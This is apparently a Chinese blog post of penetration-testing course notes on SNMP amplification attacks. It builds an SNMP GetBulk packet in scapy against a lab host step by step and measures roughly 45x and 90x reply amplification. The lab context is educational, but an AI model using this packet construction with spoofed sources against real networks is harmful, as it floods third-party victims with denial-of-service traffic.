Kali Linux渗透测试 130 拒绝服务--SNMP 放大攻击

最新推荐文章于 2024-06-11 15:49:40 发布
最新推荐文章于 2024-06-11 15:49:40 发布
阅读量1.7k 收藏 5
点赞数
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79905175
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 简单网络管理协议

    • Simmple Network Management Protocol
    • 一般用来监控和管理网络设备
    • 服务端口UDP 161/162
    • 管理站(manager/客户端)、被管理设备(agent/服务端)
    • 管理信息数据库(MIB) 是一个信息存储库,包含管理代理中的有关配置和性能的数据,按照不同分类,包含分属不同组的多个数据对象
    • 每一个节点都有一个对象标识符(OID) 来唯一的标识一IETF定义便准的MIB库厂家自定义MIB库

  • 攻击原理

    • 请求流量小,查询结果返回流量大
    • 结合伪造源地址实现攻击

2. 安装 SNMP

  • 安装 SNMP,定义 community

3. scapy 构造数据包

  • 流程

  • 步骤

构造 IP 数据包

>>> i=IP()
>>> i.dst="10.10.10.142"
>>> i.display()

构造 UDP 数据包

>>> u=UDP()
>>> u.dport=161
>>> u.sport=161

构造 SNMP 数据包

>>> s=SNMP()

设置放大倍数

>>> b=SNMPbulk()
>>> b.max_repetitions=100
>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]
>>> b.display()


>>> s.display()

设置 SNMP 数据包

>>> s.PDU=b
>>> s.display()

合成完整数据包

>>> r=(i/u/s)
>>> r.display()

发送数据包

>>> sr1(r)

发送 98 字节,返回 4534 字节的数据包

测试放大200倍效果

>>> b.max_repetitions=200
>>> s.PDU=b
>>> s.display()


>>> r=(i/u/s)
>>> r.display()
>>> sr1(r)

发送 99 字节,返回 8894 字节

网络安全打工人
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全牛学习笔记】SNMP放大攻击
edu_aqniu的博客
10-16 3082
SNMP放大攻击                                                              简单网络管理协议                                                              - Simple Network Management Protocol                  
SNMP(Simple Network Management Protocol)——简单网络管理协议
PICACHU+++的博客
09-05 3970
SNMP是广泛应用于TCP/IP网络的一种通用网络管理协议,可以实现对全网中所有设备的集中管理,远比CLI和Web管理方式更加高效。而且,因为SNMP是国际通用协议,所以各大品牌设备都支持。一套SNMP的网络管理系统可以对不同种类和不同厂商的设备进行统一管理,从而提升网络的管理效率。..................
snmp-check一键获取SNMP信息(KALI工具系列二十一)
最新发布
LNN0212的博客
06-11 1308
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。SNMP-Check 是一个用来进行 SNMP 信息收集的工具,可以帮助你获取目标设备的详细信息。
SNMP getbulk参数说明
热门推荐
HTJOY1202的专栏
12-08 1万+
SNMPv2 defines the get-bulk operation, which allows a management application to retrieve a large section of a table at once. The standard get operation can attempt to retrieve more than one MIB obje
力扣---2020.4.19
Carroll的博客
05-23 178
466. 统计重复个数 class Solution { // 循环节 public int getMaxRepetitions(String s1, int n1, String s2, int n2) { int len1 = s1.length(); int len2 = s2.length(); // 特判 i...
SNMP协议的7种PDU
Ant Ren的专栏
12-03 5407
Simple Network Management Protocol i.e. SNMP is a simple request/response protocol in which SNMP manager communicates with SNMP agents/managed devices using SNMP PDU’s (Packet Data Unit). There ar
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
2. kali Linux部署SNMP服务
世界那么大,我要学编程看看!
06-09 1527
2. kali Linux部署SNMP服务
SNM4J 入门 同步获取数据
lanyingtianshiabc的专栏
03-12 600
package com.sdstc.maxvalue.nms.services.cheng; import java.io.IOException; import java.util.Vector;   import org.snmp4j.CommunityTarget; import org.snmp4j.PDU; import org.snmp4j.Snmp; impor
Kali渗透测试之服务扫描2——SNMP、SMB、SMTP扫描
浅浅的博客
05-05 3888
一、SNMP扫描 SNMP(简单网络管理协议)明文 基于SNMP,进行网络设备监控,如:交换机、防火墙、服务器,CPU等其系统内部信息,基本都可以监控到。 信息的金矿,经常被管理员配置错误 community:登录证书,默认值为public。容易被管理员遗忘修改其特征字符。两个默认的community strings,一个是public(可读),另一个是private(可写) 服务器:1...
kali工具----枚举工具
Joshua.Lee
04-13 792
DNS枚举可以帮助用户收集目标组织的关键信息,如用户名、计算机名和IP地址等,为了获取这些信息,用户可以使用DNSenum工具。它不仅可以查询网站的主机地址信息、域名服务器和邮件交换记录,还可以在域名服务器上执行axfr请求,然后通过脚本得到扩展域名信息,提取子域名并查询,最后计算C类地址并执行whois查询,执行反向查询,把地址段写入文件。它使用SNMP的GETNEXT请求,查询指定的所有OID(SNMP协议中的对象标识)树信息,并显示给用户。输出的信息显示了DNS服务的详细信息。
SNMP连接失败
qq_44534541的博客
05-06 2303
SNMP连接失败常见的原因有以下几个:
SNMP放大攻击原理及实战演示
Jeromeyoung
03-20 4155
SNMP(Simple Network Management Protocol):简单网络管理协议 SNMP主要工作原理:通过一台客户端机器向一个被管理的设备发出查询请求获取这台设备当前运行状态的检测等情况,网络监控一般是基于SNMP与Agent。 即:向管理的目标发送指令进行配置设置;网络监控:网络运行状态的监视 在SNMP的服务中,(被监控设备)端口UDP 161为主动查询请求;162端...
kali】21-服务扫描——SNMP
(∪.∪ )...zzz的博客
10-20 1218
这里写目录标题一、SNMP扫描1. SNMP扫描2. MIB Tree:二、 前期准备1. SNMP扫描——onesixtyone2. SNMP扫描——snmpwalk3. SNMP扫描——snmp-check 只是学习记录 linux里切换python版本 sudo update-alternatives --config python //显示当前系统中所有的Python版本 一、SNMP扫描 1. SNMP扫描 SNMP:简单网络管理协议 基于SNMP,进行网络设备监控,如:交换机、防火墙、服
kali-信息收集】(1.2)SNMP枚举:Snmpwalk、Snmpcheck;SMTP枚举:smtp-user-enum
08-01 1470
kali-信息收集】SNMP枚举、SMTP枚举
Kali Linux渗透测试实战指南
"Kali Linux 渗透测试实训手册,包含Kali中各种工具的使用方法,适合初学者通过实践操作快速掌握渗透测试技能。书中提供了详细的实例解析,包括安装Kali、Windows、Metasploit等系统,以及使用各种必备工具如VMware...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值